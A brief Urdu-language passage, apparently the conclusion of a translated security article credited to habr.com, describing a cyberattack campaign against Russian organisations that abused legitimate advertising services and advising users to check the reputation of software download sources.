یہ مہم سائبر حملوں میں جائز اشتہاری خدمات کے استعمال کی ایک مثال ہے۔ یہ اسکیم روسی تنظیموں کو نشانہ بناتی ہے، لیکن غیر روسی خدمات کا استعمال کرتے ہوئے اس طرح کے حملے کو دیکھ کر ہمیں حیرت نہیں ہوگی۔ سمجھوتہ سے بچنے کے لیے، صارفین کو اپنے ڈاؤن لوڈ کردہ سافٹ ویئر کے ماخذ کی ساکھ پر اعتماد ہونا چاہیے۔
سمجھوتہ کے اشارے اور MITER ATT&CK اوصاف کی مکمل فہرست پر دستیاب ہے۔ .
ماخذ: www.habr.com